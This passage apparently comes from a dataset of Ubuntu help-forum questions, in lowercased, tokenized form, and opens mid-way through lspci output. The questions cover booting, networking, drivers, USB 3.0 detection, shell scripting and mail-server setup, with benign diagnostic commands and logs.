64-bit , non-prefetchable ) [ size=256 ] i/o ports at 5040 [ size=32 ] 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company radeon hd 7670m flags : bus master , fast devsel , latency 0 , irq 46 memory at 80000000 ( 64-bit , prefetchable ) [ size=256m ] memory at a2000000 ( 64-bit , non-prefetchable ) [ size=128k ] i/o ports at 4000 [ size=256 ] expansion rom at a2020000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : radeon 07:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie subsystem : hewlett-packard company device 18ec flags : bus master , fast devsel , latency 0 , irq 49 memory at a3510000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : rt2800pci 07:00.1 bluetooth : ralink corp. rt3290 bluetooth subsystem : hewlett-packard company device 18ec flags : bus master , fast devsel , latency 0 , irq 11 memory at a3500000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) subsystem : hewlett-packard company device 183e flags : bus master , fast devsel , latency 0 , irq 43 i/o ports at 3000 [ size=256 ] memory at a3404000 ( 64-bit , prefetchable ) [ size=4k ] memory at a3400000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) subsystem : hewlett-packard company device 183e flags : bus master , fast devsel , latency 0 , irq 44 memory at a1000000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : < access denied > kernel driver in use : rtsx_pci
344687	how to set environment variable before running script inside hooks/install ?	i am create a simple charm to get my symfony2 webapp from git and deploy it on ec2 . after getting the source from git , i want to run composer to resolve dependencies but i keep getting this error : info juju context.go:221 worker/uniter : hook the home or composer_home environment variable must be set for composer to run correctly i am running composer using below command inside my hooks/install script juju-log `` running composer '' /usr/bin/php composer.phar install i also tried juju-log `` running composer '' composer_home= $ { app_dir } ; /bin/bash -c `` /usr/bin/php composer.phar install '' how can i set home or composer_home so that this command can be executed ?
344688	how to point to grub instead of windows loader ?	i am relatively new to ubuntu and just installed 12.04.2 on my machine alongside the pre-installed windows 8 . i created a new ext4 partition near the beginning of my disk , ran boot-repair from a live session and told it to set this new partition as the boot point and the windows efi partition as the efi boot . now when i boot my computer , it only starts into windows . if i enter into the boot manager during startup ( f9 ) , my boot options are : os boot manager ( loads windows ) , ubuntu ( loads grub with a choice of ubuntu or windows ) , boot from efi file , notebook hard drive . i would like to set grub as the default so that i do not have to enter the boot manager each time to load ubuntu . i ran boot-repair once more and obtained this information : http : //pastebin.ubuntu.com/6097128/ . how can i correct this ? thanks !
344689	5.1 audio is not working on ubuntu 13.04	i have 5.1 channel audio output . but with ubuntu 13.04 , sound is not coming from subwoofer , front right , rear right .
344694	how to set up wifi connection on a macbook ( early 2008 ) /ubuntu 12.04 lts ?	i just installed ubuntu 12.04 lts . the system works ok but i ca n't get a wireless internet connection . so far , i can only get a wired connection ( about 50 cm from the modem ) . i went through various help topics requesting to install some drivers but nothing worked . i thought i could set the wireless connection manually but i ca n't find any clear and/or relevant documentation about it . any suggestion ? or could you suggest another ubuntu version that would possibly solve the problem for my computer ? and please do n't tell me to get a longer cable ! thx ; )
344695	warnings during update	update manager failed to work , returning the error message `` requires installation of untrusted packages '' . i poked around answers and used get-apt from the command line . during the update i got two warning messages : failed to detect canonical device of dev/sda9 and could not determine root device from /etc/fstab should i be worried and does something need to be done , and if so what ? how can i save the messages scroll down while at the command prompt ? as you can probably guess i 'm just starting in ubuntu . thanks !
344696	no wired connection in 12.04 lts ( 64bit )	i have installed 13.04 ( 64bit ) and after not having any wired internet , did a fresh install with 12.04 ( 64bit ) . the machine was previously running windows 7 with wired connection working fine . a wierd issue is that normal google searches ( even images ! ) work from firefox . clicking on any links fails , however . i can not paste terminal outputs as i only have wired access from the ubuntu machine . uname -r shows that the kernel is : 3.8.0-29-generic . ifconfig shows that eth0 has an inet address ( 129.11.224.156 ) pinging google.com or 173.194.70.101 gives the following result : ping www.google.com ( 173.194.70.101 ) 56 ( 84 ) bytes of data 4 packets transmitted , 0 received , 100 % packet loss , time 3023ms pinging the router is successful : 4 packets transmitted , 4 received , 0 % packet loss , time 3000ms dmesg gives the following output for eth0 : tg3 0000:02:00.0 eth0 : link is up at 100 mbps , full duplex tg3 0000:02:00.0 eth0 : flow control is off for tx and off for rx let me know if i need to provide more information . thanks ! update 1 : output for sudo lshw -class network : network description : ethernet interface product : netlink bcm5784m gigabit ethernet pcie vendor : broadcom corp physical id : 0 bus info pci @ 0000:02:00.0 local name : eth0 version : 10 serial 00:23 : ae:65:31 : ce size : 100mbit/s capacity : 1gbit/s width : 64bits clock : 33mhz output for route -n kernel ip routing table destination , gateway , genmask , flags , metric , ref , iface 0.0.0.0 , 129.11.224.103 , 0.0.0.0 , ug , 100 , 0 , eth0 192.11.224.0 , 0.0.0.0 , 255.255.255.0 , u , 0 , 0 , eth0 169.254.0.0 , 0.0.0.0 , 255.255.0.0 , u , 1000 , 0 , eth0 update 2 : changing the mtu to 1472 and restarting the network did not have any effect here is the output for cat /etc/network/interfaces : auto lo iface lo inet loopback update 3 : ok so apparently i need to go through a proxy server . i have followed instructions given here : how to configure ubuntu desktop to use your proxy server this has been successful in enabling fullinternet access . i have set proxies following a few instructions here . thank you for the help !
344702	is it possible to ask arbitrary questions in the preseed during ubuntu install	i have built an automatic installation system for building nodes from bare metal , it produces a pretty basic install , then installs puppet and contacts the puppetmaster for the rest of the configuration . what i would like to be able to do is inject a question into the preseed such that i could ask `` what is the role of this server ? '' which in turn would just write the value to a temporary file , that facter would parse and include in the puppet catalog run . so basically , ask a question during install , provide a list of available answers and write the response to a file . is that do-able ?
344707	virtualbox messages	after i upgraded to virtualbox 4.2.18 i noticed that my kernel log displays the following messages : sep 12 17:00:07 pc-allard kernel : [ 3721.553696 ] cpum : apic 00 at 00000000fee00000 ( mapped at ffffc900110bc000 ) - ver 0x00050014 , lint0=0x10700 lint1=0x00400 pc=0x10400 thmr=0x000fa sep 12 17:00:07 pc-allard kernel : [ 3721.553702 ] cpum : apic 03 at 00000000fee00000 ( mapped at ffffc90011156000 ) - ver 0x00050014 , lint0=0x10700 lint1=0x10400 pc=0x10400 thmr=0x000fa sep 12 17:00:07 pc-allard kernel : [ 3721.553704 ] cpum : apic 02 at 00000000fee00000 ( mapped at ffffc900110be000 ) - ver 0x00050014 , lint0=0x10700 lint1=0x10400 pc=0x10400 thmr=0x000fa sep 12 17:00:07 pc-allard kernel : [ 3721.553714 ] cpum : apic 01 at 00000000fee00000 ( mapped at ffffc900110ba000 ) - ver 0x00050014 , lint0=0x10700 lint1=0x10400 pc=0x10400 thmr=0x000fa what does it means ?
344708	is there a way to move files between guest and host in virtualbox ?	i am using virtualbox 4.2.10 for ubuntu . i had to unzip a .7zip file so i used gust windowsxp to unzip . but i ca n't find a way to get it back to host ubuntu . is there a way to share between gust and host easily
344712	how to install 'precise ' linux-image package from livecd after i accidentally deleted all kernels ?	i had some strange issues installing sudo apt-get install linux-image-server and for some reason apt-get was trying to install two different versions of the kenrel , the real issue was that i removed the previous kernel . the pc got rebooted ( i work with two pc 's with kvm , pressed alt + ctrl + del while thinking i was in windows getting ubuntu to reset itself ) and walla ! i have only meme test in grub , great ... any idea how i can install a kernel image using livecd and apt-get ? or am i better with downloading what i need from ubuntu package site and then how do i use dpkg to install it with a livecd on my local machine ? somehow chroot to it from the live cd ?
344724	install postfix and store all incoming mails in mysql db	i cant config . postfix correcly , could someone please help me with that ? the google results i find , are n't really helping me.. its about a problem i try to solve for weeks now.. so : i need to be able to receive emails that are sent to email adresses using my domain name , for example ( badabum @ domainname.com ) , this email will contain informations as a string , which i need to store in my database . getting the information is not a problem , ad i would just do that with php or node.js . all i need help with , is receiving emails and storing the body of those mails in my database ad strings . i could n't really find helpful answers in the web , cause all those solutions are for full mail servers that send , receive and filter spam and viruses , what i obviously do n't need ! also all these answers i found assume that you have high level skills in what you do*ubuntu and mailservers* , which i really dont have.. im currently working on an project which will help me finance my collage , which starts october this year , when collage starts , i wont have time to finish my project , so 8 months of hard work would be destroyed=/.. therefore i really need your help to finish this . what i have so far : i have an ubuntu vserber , it has mysql and so on , so all i need is the software to receive emails . i also have bought a domain . please tell me now what i need , i have installed postfix , but how do i need to config . it ? i cant get it started..=/ ad what else do i need to install to ensure that all received mails are directly stored in my database ? please just answer if you know anything : ) it would help me a lot ! tnak you !
344725	wireless working fine- but can not connect wired ethernet in ubuntu 13.04	yesterday i installed ubuntu 13.04 on a dualboot with windows 7 preinstalled . both my wireless and wired connections work fine on windows 7 . wireless is working fine on ubuntu also- but can not get any connection through wired ethernet in ubuntu . the network adapter on my laptop is a realtek pcie . here 's the output of ifconfig : `eth0 link encap : ethernet hwaddr dc:0e : a1:3c:86 : e5 inet6 addr : fe80 : :de0e : a1ff : fe3c:86e5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7177 errors:0 dropped:36 overruns:0 frame:0 tx packets:259 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:491744 ( 491.7 kb ) tx bytes:61576 ( 61.5 kb ) ` any help on how i could get my wired network working ? i really need ethernet working cos i only have wireless connection at my uni ... but wired broadband at home !
344734	any way to play windows games on ubuntu ?	i was wondering if i can play windows games on ubuntu through software so i can play games like wildstar ( mmo ) , steam/origin games etc . personally i do n't want to use windows , i 've always disliked it but to play the latest games you need it so i 've always felt `` forced '' so to speak . thank you in advance dean
344736	script error under dash	why the following script is giving me a error by using dash ( sh ) and the same is working by using bash ? i can not see the error thanks for your help . # ! /bin/bash # calculate the length of the hypotenuse of a pythagorean triangle # using hypotenuse^2 = adjacent^2 + opposite^2 echo -n `` enter the adjacent length : `` read adjacent echo -n `` enter the opposite length : `` read opposite asquared= $ ( ( $ adjacent ** 2 ) ) # get a^2 osquared= $ ( ( $ opposite ** 2 ) ) # get o^2 hsquared= $ ( ( $ osquared + $ asquared ) ) # h^2 = a^2 + o^2 hypotenuse=`echo `` scale=3 ; sqrt ( $ hsquared ) '' | bc` # bc does sqrt echo `` the hypotenuse is $ hypotenuse '' the result : myname @ myhost : ~ $ sh ./hypotenusa.sh enter the adjacent length : 12 enter the opposite length : 4 ./hypotenusa.sh : 12 : ./hypotenusa.sh : arithmetic expression : expecting primary : `` 12 ** 2 '' myname @ myhost : ~ $ bash ./hypotenusa.sh enter the adjacent length : 12 enter the opposite length : 4 the hypotenuse is 12.649 my ubuntu version is 13.04 .
344738	is there any software for tracking tv shows ?	i 'm looking for a software to track my favorite tv shows on ubuntu 13.04 to know when next episodes will be on air . is there any to recommend me ?
344740	can not remove script virus in ubuntu	after i scan via clamav/clamtk , i found 1 possible threat that i can not remove/quarantine . how to remove virus ? or is this false positive ? /usr/lib/ruby/1.9.1/rdoc/generator/template/darkfish/js/thickbox-compressed.js pua.script.packed-1
344746	usb 3.0 works sometimes , usb 2.0 works always	i 've done some researching over the internet and this seems to be ... i do n't know ... a hardware problem ? i ca n't tell exactly . one thing i know for sure is that it happens to a lot people in windows and they ca n't solve it by tinkering with settings ( duh , cause it 's happening outside of windows ) but some people seem to be able to fix it by updating usb drivers , so ... here 's the problem ... and it 's only intermittent ; however it is happening to me right now and i figured it was a great opportunity to post some console output to try and gleam as much information as possible : ========================== problem ========================== usb 3.0 devices are sometimes not detected when connected to a usb 3.0 port ; however work fine when connected to a usb 2.0 port . ========================== so i initially had an asus rog g74sx laptop with 1 usb 3.0 port and 3 usb 2.0 ports . this is when i first noticed the problem . i have a wd 3tb mybook external hard drive . one day i noticed that it was not detected in the usb 3.0 port but it was detected in any of the usb 2 ports . i plugged the drive into a windows laptop with usb 3 and everything seemed to work okay . what made even less sense is that this also caused it to be redetected by the g74sx ( running ubuntu 13.04 ) . i actually had this come up a few more times over the next week or two and was starting to surmise that ubuntu has spotty support for usb 3 connectivity . when i say it happened a few more times i mean randomly one morning i would go to plug the mybook into the usb3 port and it would not be detected after working fine the night before . it always works in usb2 and sometimes would be detected in the usb3 port after a system restart or after successfully connecting to a usb3 port in another machine ( usually windows 7 ) . after two weeks the issue ceased and the mybook would always be detected by the usb3 port . i do n't know what happened . i made no changes to bios , firmware , or any os installations . it just started working . ============================================ break ; as in no new info for a few months ============================================ so last week i grabbed an asus n56vz ( two in fact ) and an asus s56cm and threw ubuntu 13.04 on both ( had to disable secure boot for s56cm since it was a windows 8 laptop ) . now most things have been going fine except for nvidia optimus ( but i wo n't get into that here ) until this morning i woke up and the usb3 port would not detect the wd mybook ( again this an external hdd ) . the port itself is not busted as i can plug a usb mouse into it but i have no other usb3 devices to test ; however the mybook works fine in several other laptops both in ubuntu and windows . so i 've confirmed i can plug the mybook into either of my n56vzs running ubuntu 13.04 and those laptops only have usb3 ports . the mybook is also detected by another laptop in windows 7 on the usb3 port . unlike in the past , no amount of system restarting or getting the mybook to boot on other devices allows it to be detected by my s56cms usb3 port and the mybook can always be detected by usb2 . and so far , i have not been able to get the usb3 port to detect my usb3 device since this morning ( but it is working with a usb mouse ) . lsusb has the same output with/without the drive connected . here is the tail of dmesg when i plug the drive into the usb3 port ( drive responds and so does system but it never gets successfully connected ) : [ 287.115279 ] usb 4-1 : new superspeed usb device number 2 using xhci_hcd [ 287.132077 ] usb 4-1 : new usb device found , idvendor=1058 , idproduct=1140 [ 287.132088 ] usb 4-1 : new usb device strings : mfr=1 , product=2 , serialnumber=5 [ 287.132094 ] usb 4-1 : product : my book 1140 [ 287.132099 ] usb 4-1 : manufacturer : western digital [ 287.132103 ] usb 4-1 : serialnumber : 574341575a32363535333139 [ 287.148226 ] initializing usb mass storage driver ... [ 287.149341 ] scsi6 : usb-storage 4-1:1.0 [ 287.149934 ] usbcore : registered new interface driver usb-storage [ 287.149940 ] usb mass storage support registered . [ 288.147116 ] scsi 6:0:0:0 : direct-access wd my book 1140 1012 pq : 0 ansi : 6 [ 288.147537 ] scsi 6:0:0:1 : enclosure wd ses device 1012 pq : 0 ansi : 6 [ 288.149609 ] sd 6:0:0:0 : attached scsi generic sg3 type 0 [ 288.150005 ] scsi 6:0:0:1 : attached scsi generic sg4 type 13 [ 288.151177 ] sd 6:0:0:0 : [ sdc ] spinning up disk ... [ 296.161509 ] scsi 6:0:0:1 : failed to get diagnostic page 0x8000002 [ 296.161527 ] scsi 6:0:0:1 : failed to bind enclosure -19 [ 296.161567 ] ses 6:0:0:1 : attached enclosure device [ 289.152700 ] ... ... ..ready [ 303.181164 ] sd 6:0:0:0 : [ sdc ] very big device . trying to use read capacity ( 16 ) . [ 303.181502 ] sd 6:0:0:0 : [ sdc ] 5860466688 512-byte logical blocks : ( 3.00 tb/2.72 tib ) [ 303.181512 ] sd 6:0:0:0 : [ sdc ] 4096-byte physical blocks [ 303.181965 ] sd 6:0:0:0 : [ sdc ] write protect is off [ 303.181977 ] sd 6:0:0:0 : [ sdc ] mode sense : 47 00 10 08 [ 303.182403 ] sd 6:0:0:0 : [ sdc ] no caching mode page present [ 303.182415 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through [ 303.183277 ] sd 6:0:0:0 : [ sdc ] very big device . trying to use read capacity ( 16 ) . [ 303.185078 ] sd 6:0:0:0 : [ sdc ] no caching mode page present [ 303.185088 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through [ 303.236864 ] sdc : sdc1 sdc2 [ 303.237960 ] sd 6:0:0:0 : [ sdc ] very big device . trying to use read capacity ( 16 ) . [ 303.238638 ] sd 6:0:0:0 : [ sdc ] no caching mode page present [ 303.238650 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through [ 303.238661 ] sd 6:0:0:0 : [ sdc ] attached scsi disk [ 304.286643 ] hub 4-0:1.0 : can not enable port 1 . maybe the usb cable is bad ? [ 304.318630 ] usb 4-1 : usb disconnect , device number 2 [ 304.322483 ] scsi 6:0:0:0 : rejecting i/o to offline device [ 304.322498 ] scsi 6:0:0:0 : [ sdc ] killing request [ 304.322540 ] scsi 6:0:0:0 : [ sdc ] unhandled error code [ 304.322548 ] scsi 6:0:0:0 : [ sdc ] [ 304.322553 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 304.322575 ] scsi 6:0:0:0 : [ sdc ] cdb : [ 304.322579 ] read ( 16 ) : 88 00 00 00 00 00 00 00 01 7a 00 00 00 08 00 00 [ 304.322592 ] end_request : i/o error , dev sdc , sector 378 [ 304.322595 ] quiet_error : 54 callbacks suppressed [ 304.322598 ] buffer i/o error on device sdc1 , logical block 43 [ 304.322611 ] scsi 6:0:0:0 : rejecting i/o to offline device [ 304.322614 ] scsi 6:0:0:0 : [ sdc ] killing request [ 304.322620 ] scsi 6:0:0:0 : [ sdc ] unhandled error code [ 304.322622 ] scsi 6:0:0:0 : [ sdc ] [ 304.322623 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 304.322625 ] scsi 6:0:0:0 : [ sdc ] cdb : [ 304.322627 ] read ( 16 ) : 88 00 00 00 00 00 00 04 09 50 00 00 00 08 00 00 [ 304.322638 ] end_request : i/o error , dev sdc , sector 264528 [ 304.322640 ] buffer i/o error on device sdc2 , logical block 336 [ 304.322643 ] buffer i/o error on device sdc2 , logical block 337 [ 304.322645 ] buffer i/o error on device sdc2 , logical block 338 [ 304.322647 ] buffer i/o error on device sdc2 , logical block 339 [ 304.322649 ] buffer i/o error on device sdc2 , logical block 340 [ 304.322652 ] buffer i/o error on device sdc2 , logical block 341 [ 304.322654 ] buffer i/o error on device sdc2 , logical block 342 [ 304.322656 ] buffer i/o error on device sdc2 , logical block 343 [ 304.322678 ] buffer i/o error on device sdc2 , logical block 336 marla @ ultrabook : ~ $ update : so i was initially ignoring the bad cable warning because ... although i switched to a longer usb3 cable this morning , it was working on other devices . it turns out that the cable that came with the drive works fine ( this could have also been my problem with the g74sx in the past ) and the longer cable i bought does n't want to work with ... . some laptops ? hopefully someone can tell me if there is information in the dmesg output that says why this cable is n't working on this machine works fine in ubuntu or windows on different laptops ... and does this have anything to do with there being only 1 usb3 port ? although i personally do n't experience any usb3 connectivity problems in windows , i 've read that a lot of people do so i doubt this is os related . it also seems that pcs without usb2 ports do not have the problem . my local canada computers has been selling a lot of garbage quality cables lately so i 'm going to head up to the store to ream them out for the last $ 100 i 've wasted on cables that break a few weeks after the warranty but if anyone can shed some more light on this issue it would be greatly appreciated . i imagine the cable is n't the only problem when it 's working on 3/5 machines . i will let everyone know if the problem persists with a higher quality cable ... i 'm just thinking out loud here before finally posting : it 's got ta be something to do with firmware or hardware drivers or something ? i 've read some people had fixed the problem in windows by updating drivers , but i know asus website only has usb drivers for windows ... the only thing they have supported for linux is bios updates . since machines with only usb3 work fine , i can only imagine they have better drivers/firmware ? if this is a drivers issue , is there a way to get improved usb drivers in ubuntu ? would good/poor drivers make the difference in whether a device can use a lower quality cable ? lastly , have i actually solved my problem ? this cable is currently working on 1 machine with only usb3 and ubuntu and working on a machine with 1 usb3 , 2 usb2 and windows 7 ; but does not work on the s56cm with 1 usb3 , 2 usb2 and ubuntu ( i do n't feel like formatting to see if it works on windows ; i do n't use windows , do n't like windows , the windows machines belong to other people in my house ) ; however the original smaller cable that came with the mybook works all around . given all that physical information combined with the output of dmesg suggesting it 's a bad cable : the most logical conclusion i could arrive at is that i have a bad cable ( also combined with the knowledge that the distributor i bought the cable from has been selling some crap cable lately ) . so would the majority agree that it 's a bad cable ? is there anything else going on here ? or is everything the result of this bad cable ? i 'm considering to buy another cable because i need a longer usb3 but do n't know if i should go for a completely different manufacturer because all their cables are poor quality or if i just have one faulty cable in a line of good ones .
344747	can not boot computer at all	after trying to use the boot repair software via instructions , this was the pastebin that the program gave me . http : //paste.ubuntu.com/6097372/ the boot repair program did not work or should i say did not repair anything or `` change anything '' after tyring to use the live cd to manually fix grub , i am not able to mount anything in terminal . according to the pastebin , i do not see where it has my main 40 gig ssd hard drive as being visible . i am at a complete loss . this is a single boot computer with two hard drives and an 8gb thumb drive . any help would be appreciated . john ( turbotech )
344748	ubuntu still identify .exe application , however i have remove winehq	i have remove winehq in via terminal completely and other winehq configuration . but , ubuntu still identify .exe application , not likely never install winehq before . how to remove all winehq programs , including icons , configuration , and the other objects that it can not identify .exe app again ? because i 'm afraid that it can spread the malware like windows .
344757	errors while running upgrade from the terminal . can anyone help me analyse it ?	reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up linux-image-extra-3.8.0-30-generic ( 3.8.0-30.44 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-30-generic /boot/vmlinuz-3.8.0-30-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.8.0-30-generic /boot/vmlinuz-3.8.0-30-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-30-generic /boot/vmlinuz-3.8.0-30-generic update-initramfs : generating /boot/initrd.img-3.8.0-30-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.8.0-30-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-extra-3.8.0-30-generic.postinst line 1010. dpkg : error processing linux-image-extra-3.8.0-30-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports has already been reached dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-extra-3.8.0-30-generic ; however : package linux-image-extra-3.8.0-30-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.8.0.30.48 ) ; however : package linux-image-generic is not configured yet . no apport report written because maxreports has already been reached dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports has already been reached errors were encountered while processing : linux-image-extra-3.8.0-30-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
344762	problem getting amd radeon 6870 configured	i am trying to launch amd catalyst control center . however , it requests a password . i was not asked to enter a password for this program during installation . does anyone know the default password and how to reinstall it , if needed ?
344763	cant boot ubuntu	okey this is quete a long story . but i had running ubuntu on my laptop dual boot with windows vista ( wubi ) . but the partition i installed it on became too smal . so i bootet into a livescd/usb of mint . used gparted to increase the partition with a bit of the windows partition . that went okey until i tried to boot into ubuntu again and it crachet with a massage of minimal bash like command line . then i tried a lot of things to repair it from the livecd of mint and afterwards with ubuntu ( wich i had to create fom the mint usb ) using boot-repair and a lot of command lines . then i found out that al these things did not work with wubi so i uninstalled it and installed it again with ubuntu livecd . after installation it rebooted but it automaticaly booted into windows . i then with freec ... that proggram to add boots to wind boot loader then it crachet into mimimal bash like .. again i alreidy treid repairing with livecd . sory for wrong spellings i am not native englisch edit : and now i treid to reinstal it agian and now on reboot it schows grub rescue i do n't even have the chance to boot into windows anymore
344764	ampersand to open file stopped working	i have a symbolic link to sublime text 2 'subl ' , so usually i open or create files in the current directory by typing subl & hw2.py for example . this would open the file in the editor and allow me to continue using the terminal . however , today it does n't like that any more and i get the following response : $ subl & hw1.py [ 1 ] 2563 hw1.py : command not found any idea what 's going on here ? thanks !
344769	why is there a line length limit in kate ?	in kate , kde 's text editor , and other editors too i 'm sure , sometimes files will not open correctly because of this line length limit . why is it there ? is it safe to set this to an extreme number or is there a way to get rid of it somehow ? my kate version : kate version 3.10.5 using kde development platform 4.10.5
344772	is the boot process longer when installed on a hard drive than from running on a usb stick ?	i have a windows 7 sony vaio laptop . i have created a bootable usb stick with ubuntu 12.04 and have tried ubuntu and like it . i would like to have it alongside windows 7 . when i boot from the usb , i receive lots of messages scrolling by until eventually the ubuntu logo appears and ubuntu starts . the boot takes at least a minute or two . my question is , is this long boot process only for the usb boot ? if i install from the usb , will subsequent ubuntu startups from my hard drive be quicker , without all the messaging ? or is there a problem with my usb and i need to re-create the usb ?
344776	installing ubuntu 13.04 in a different partition than windows	i need help installing ubuntu 13.04 to my computer . i have downloaded ubuntu 13.04 ( 64-bit ) and burned it to a dvd . i test drove the new distribution and it worked great , but installing it poses a bit of a problem for me ( i 'm an inexperienced ubuntu/linux user ) . here 's what i want to do . i want to be able to dual-boot my system like i did when i had ubuntu 12.04 installed on it . i previously used wubi to install ubuntu and it allowed me to install ubuntu onto my d : \ partition . i have two partitions on my hdd . the first is c : \ and it is where windows vista home premium ( 32-bit ) is installed ( please note that my machine 's processor is an amd 64-bit and that is why i downloaded the 64-bit flavor of 13.04 ) . the second is d : \ and it was where ubuntu 12.04 used to reside prior to trying to install 13.04 . when i tried installing 13.04 alongside of windows vista , it does not allow me to pick the partition i want to install to , so i tried `` something else '' and i could not get the installation to work there either . here 's what i tried : i set up sdb as the partition i wanted to install ubuntu in and set the mount point to / ( i do n't even know if that is right ) , and then it told me that i did n't have a swap partition/space , so i reduced the size of sdb and made another partition ( sdc ) out of the remaining space , but i did n't know how to label it as `` swap '' nor do i know where to set the mount point of sdc so i 'm stuck . i just thought of one thing and that is could i go and delete the partitions i have set up for ubuntu using disk management in windows and then extend windows into that space and then try installing ubuntu alongside windows vista ? would that be the easiest way to do it ? can anyone help me out here ?
344779	how to set battery charging thresholds on t420s	i have a thinkpad t420s and would like to expand the battery service life ( not maximize time the laptop can run off a battery ) i have tp-smapi-dkms and sysfsutils installed , and when i run : $ ll /sys/devices/platform/smapi/bat0 total 0 drwxr-xr-x 2 root root 0 sep 12 08:00 ./ drwxr-xr-x 5 root root 0 sep 12 07:59 ../ -rw-r -- r -- 1 root root 4096 sep 12 08:15 barcoding -rw-r -- r -- 1 root root 4096 sep 12 08:26 charging_max_current -rw-r -- r -- 1 root root 4096 sep 12 08:26 charging_max_voltage ... -rw-r -- r -- 1 root root 4096 sep 12 08:15 power_avg -rw-r -- r -- 1 root root 4096 sep 12 08:15 power_now -rw-r -- r -- 1 root root 4096 sep 12 08:15 remaining_capacity -rw-r -- r -- 1 root root 4096 sep 12 08:15 remaining_charging_time -rw-r -- r -- 1 root root 4096 sep 12 08:15 remaining_percent -rw-r -- r -- 1 root root 4096 sep 12 08:26 remaining_percent_error -rw-r -- r -- 1 root root 4096 sep 12 08:15 remaining_running_time -rw-r -- r -- 1 root root 4096 sep 12 08:26 remaining_running_time_now -rw-r -- r -- 1 root root 4096 sep 12 08:15 serial -rw-r -- r -- 1 root root 4096 sep 12 08:17 start_charge_thresh -rw-r -- r -- 1 root root 4096 sep 12 08:15 state -rw-r -- r -- 1 root root 4096 sep 12 08:00 stop_charge_thresh -rw-r -- r -- 1 root root 4096 sep 12 08:15 temperature -rw-r -- r -- 1 root root 4096 sep 12 08:15 voltage so there should be start_charge_thresh and stop_charge_thresh available , i can set when the battery stops charging with : $ echo 80 | sudo tee /sys/devices/platform/smapi/bat0/stop_charge_thresh 80 $ echo 80 | sudo tee /sys/devices/platform/smapi/bat0/stop_charge_thresh 80 but setting when it should start charging fails : $ echo 40 | sudo tee /sys/devices/platform/smapi/bat0/start_charge_thresh 40 $ cat /sys/devices/platform/smapi/bat0/start_charge_thresh cat : /sys/devices/platform/smapi/bat0/start_charge_thresh : no such device or address how is this possible ? i am running out of time.. when i plug in the adapter it still is n't charging !
344784	how to search program in /usr/sbin via dash	i 'm using text editor . i 've executable for that ... .i put it in /usr/sbin and now i can turn it on via commandline . now how will that application will be installed . i mean how can i directly search that application from dash and use it , instead of using commandline everytime .
344796	cloned over /dev entry for linux partition . how do i recover ?	i have a dual boot windows and lubuntu i was cloning a usb stick and accidentally set it to clone over my lubuntu partition rather than onto another stuck ( duh ... ) . a few seconds into doing this , things started to go very wrong . i restarted and was greeted with `` grub rescue '' . i used boot-repair : https : //help.ubuntu.com/community/boot-repair this restored me back to my windows partition . however , i now can not see my ext4 linux partition from windows using ext2explore . also , i am not offered an os selection on boot - it just goes straight to windows . i 'm a bit stuck now really . any ideas ?
344797	no sound on music players and youtube etc . only get system sounds	sound is not working , i get system sounds rhythmbox doesnt work
344799	desktop picture - disappears !	it 's really nice to have the option of changing my desktop picture ( like every other os ever written ) , but why does it go away after every cold or warm reboot ?
344800	lubuntu - maximize windows by dragging to top	i currently installed lubuntu 12.04 on a laptop to save resources compared to ubuntu . i am missing the ability to maximize windows by dragging them to the top of the screen with the mouse . is it possible to enable on lubuntu ? if it is , will it offset the resource savings that i got from choosing the lxde desktop ?
344802	why is apt-get always using proxy , although no proxy is configured ?	i 'm trying to disable the proxy for apt-get but it seems like apt-get gets it 's proxy configuration from somewhere else other than /etc/apt/apt.conf , because although the apt.conf file is empty ( and the system proxy set to none ) it 's still trying to connect to the proxy . anyone got an idea ?
344803	how can i install ubuntu on an old macbook without a cd or usb drive ?	i have an old macbook 1,1 here and want to install ubuntu on it . however the disk reader is broken . this leaves me with a bootable usb , however this is not recognized when i boot with efi ( if that makes sense ) . is there any way that i can install ubuntu without a cd or usb drive ?
344805	how can i install an absolute minimal install of x11 on ubuntu server 12.04 ?	i 'm hesitant about installing x11 on a server machine because i want it to contain the absolute minimal amount of software needed . however , some guis ( for ffmpeg encoding , etc ) are useful so i was thinking about installing x11 . what is the absolutely minimum number of packages i would need to install in order to run some simple ( ? ) guis like the frontends for ffmpeg , etc . i do n't think i need a window manager or anything else , etc .
